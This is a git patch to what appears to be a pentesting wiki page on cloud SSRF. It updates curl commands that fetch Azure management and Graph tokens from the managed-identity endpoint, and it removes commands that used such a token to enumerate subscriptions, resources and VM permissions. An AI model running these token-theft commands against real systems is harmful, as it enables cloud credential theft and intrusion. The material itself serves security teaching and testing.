From 10ff48619048ae0ad9f6019d05e206631d9e555c Mon Sep 17 00:00:00 2001
From: SirBroccoli <carlospolop@gmail.com>
Date: Sat, 21 Dec 2024 16:58:05 +0000
Subject: [PATCH] GITBOOK-4453: No subject

---
 .../cloud-ssrf.md                             | 20 +++----------------
 1 file changed, 3 insertions(+), 17 deletions(-)

diff --git a/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md b/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md
index 7d272d781..dd19a3f76 100644
--- a/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md
+++ b/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md
@@ -482,26 +482,13 @@ Most of the time, you want a token for one of these resources:
 echo $IDENTITY_HEADER
 echo $IDENTITY_ENDPOINT
 
-# You should also be able to find the folder:
+# (Fingerprint) You should also be able to find the folder:
 ls /opt/microsoft
-#and the file
-ls /opt/microsoft/msodbcsql17
 
 # Get management token
-curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER
+curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2019-08-01" -H X-IDENTITY-HEADER:$IDENTITY_HEADER
 # Get graph token
-curl "$IDENTITY_ENDPOINT?resource=https://graph.azure.com/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER
-
-# API
-# Get Subscriptions
-URL="https://management.azure.com/subscriptions?api-version=2020-01-01"
-curl -H "Authorization: $TOKEN" "$URL"
-# Get current permission on resources in the subscription
-URL="https://management.azure.com/subscriptions/<subscription-uid>/resources?api-version=2020-10-01'"
-curl -H "Authorization: $TOKEN" "$URL"
-# Get permissions in a VM
-URL="https://management.azure.com/subscriptions/<subscription-uid>/resourceGroups/Engineering/providers/Microsoft.Compute/virtualMachines/<VM-name>/providers/Microsoft.Authorization/permissions?api-version=2015-07-01"
-curl -H "Authorization: $TOKEN" "$URL"
+curl "$IDENTITY_ENDPOINT?resource=https://graph.azure.com/&api-version=2019-08-01" -H X-IDENTITY-HEADER:$IDENTITY_HEADER
 ```
 
 ```powershell
@@ -650,4 +637,3 @@ Learn & practice GCP Hacking: <img src="../../.gitbook/assets/grte.png" alt="" d
 
 </details>
 {% endhint %}
-